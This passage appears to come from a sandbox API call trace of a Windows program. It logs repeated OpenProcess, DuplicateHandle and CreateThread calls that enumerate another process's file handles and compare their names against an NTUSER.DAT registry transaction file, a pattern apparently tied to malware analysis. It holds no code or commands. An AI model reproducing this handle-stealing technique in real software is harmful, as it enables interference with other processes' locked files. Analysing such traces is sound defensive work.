lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.607] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.608] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.608] CloseHandle (hObject=0x1e4) returned 1 [0164.608] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.608] CloseHandle (hObject=0x194) returned 1 [0164.608] CloseHandle (hObject=0x1e8) returned 1 [0164.608] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.608] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.609] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.610] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.610] CloseHandle (hObject=0x1e4) returned 1 [0164.610] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.610] CloseHandle (hObject=0x194) returned 1 [0164.610] CloseHandle (hObject=0x1e8) returned 1 [0164.610] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.610] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.610] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.611] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.612] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.612] CloseHandle (hObject=0x1e4) returned 1 [0164.612] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.612] CloseHandle (hObject=0x194) returned 1 [0164.612] CloseHandle (hObject=0x1e8) returned 1 [0164.612] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.612] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.613] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.614] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.614] CloseHandle (hObject=0x1e4) returned 1 [0164.614] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.614] CloseHandle (hObject=0x194) returned 1 [0164.614] CloseHandle (hObject=0x1e8) returned 1 [0164.614] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.614] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x278, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.616] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.620] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.620] CloseHandle (hObject=0x1e4) returned 1 [0164.620] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.620] CloseHandle (hObject=0x194) returned 1 [0164.620] CloseHandle (hObject=0x1e8) returned 1 [0164.621] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.621] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.621] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.622] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.622] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.623] CloseHandle (hObject=0x1e4) returned 1 [0164.623] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.623] CloseHandle (hObject=0x194) returned 1 [0164.623] CloseHandle (hObject=0x1e8) returned 1 [0164.623] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.623] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.624] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.624] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.624] CloseHandle (hObject=0x1e4) returned 1 [0164.625] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.625] CloseHandle (hObject=0x194) returned 1 [0164.625] CloseHandle (hObject=0x1e8) returned 1 [0164.625] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.625] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.626] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.627] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.627] CloseHandle (hObject=0x1e4) returned 1 [0164.627] _wcsicmp (_Str1="\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.627] CloseHandle (hObject=0x194) returned 1 [0164.627] CloseHandle (hObject=0x1e8) returned 1 [0164.627] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.627] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.628] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.629] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.629] CloseHandle (hObject=0x1e4) returned 1 [0164.629] _wcsicmp (_Str1="\\comctl32.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.629] CloseHandle (hObject=0x194) returned 1 [0164.629] CloseHandle (hObject=0x1e8) returned 1 [0164.629] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.629] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.629] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.630] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.630] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.631] CloseHandle (hObject=0x1e4) returned 1 [0164.631] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.631] CloseHandle (hObject=0x194) returned 1 [0164.631] CloseHandle (hObject=0x1e8) returned 1 [0164.631] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.631] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.631] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.632] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.632] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.632] CloseHandle (hObject=0x1e4) returned 1 [0164.632] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.633] CloseHandle (hObject=0x194) returned 1 [0164.633] CloseHandle (hObject=0x1e8) returned 1 [0164.633] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.633] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.634] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.634] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.635] CloseHandle (hObject=0x1e4) returned 1 [0164.635] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.635] CloseHandle (hObject=0x194) returned 1 [0164.635] CloseHandle (hObject=0x1e8) returned 1 [0164.635] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.635] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.635] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.653] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.654] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.654] CloseHandle (hObject=0x1e4) returned 1 [0164.654] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0164.654] CloseHandle (hObject=0x194) returned 1 [0164.654] CloseHandle (hObject=0x1e8) returned 1 [0164.654] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.654] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x408, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.655] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.656] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.656] CloseHandle (hObject=0x1e4) returned 1 [0164.656] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.656] CloseHandle (hObject=0x194) returned 1 [0164.657] CloseHandle (hObject=0x1e8) returned 1 [0164.657] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.657] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.658] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.658] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.659] CloseHandle (hObject=0x1e4) returned 1 [0164.659] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0164.659] CloseHandle (hObject=0x194) returned 1 [0164.659] CloseHandle (hObject=0x1e8) returned 1 [0164.659] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.659] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x458, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.660] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.661] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.661] CloseHandle (hObject=0x1e4) returned 1 [0164.661] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0164.661] CloseHandle (hObject=0x194) returned 1 [0164.661] CloseHandle (hObject=0x1e8) returned 1 [0164.661] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.661] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.661] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.662] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.662] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.663] CloseHandle (hObject=0x1e4) returned 1 [0164.663] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0164.663] CloseHandle (hObject=0x194) returned 1 [0164.663] CloseHandle (hObject=0x1e8) returned 1 [0164.663] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.663] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.663] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.664] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.665] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.665] CloseHandle (hObject=0x1e4) returned 1 [0164.665] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0164.665] CloseHandle (hObject=0x194) returned 1 [0164.665] CloseHandle (hObject=0x1e8) returned 1 [0164.665] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.665] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.666] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.667] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.667] CloseHandle (hObject=0x1e4) returned 1 [0164.667] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.667] CloseHandle (hObject=0x194) returned 1 [0164.667] CloseHandle (hObject=0x1e8) returned 1 [0164.667] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.667] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.668] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.669] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.669] CloseHandle (hObject=0x1e4) returned 1 [0164.669] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.669] CloseHandle (hObject=0x194) returned 1 [0164.669] CloseHandle (hObject=0x1e8) returned 1 [0164.669] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.669] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.669] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.670] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.671] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.671] CloseHandle (hObject=0x1e4) returned 1 [0164.671] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.671] CloseHandle (hObject=0x194) returned 1 [0164.671] CloseHandle (hObject=0x1e8) returned 1 [0164.671] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.671] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.672] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.673] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.673] CloseHandle (hObject=0x1e4) returned 1 [0164.673] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.673] CloseHandle (hObject=0x194) returned 1 [0164.673] CloseHandle (hObject=0x1e8) returned 1 [0164.673] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.673] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x514, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.674] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.675] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.675] CloseHandle (hObject=0x1e4) returned 1 [0164.675] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0164.675] CloseHandle (hObject=0x194) returned 1 [0164.676] CloseHandle (hObject=0x1e8) returned 1 [0164.676] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.676] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x51c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.676] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.677] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.677] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.678] CloseHandle (hObject=0x1e4) returned 1 [0164.678] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0164.678] CloseHandle (hObject=0x194) returned 1 [0164.678] CloseHandle (hObject=0x1e8) returned 1 [0164.678] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.678] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x524, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 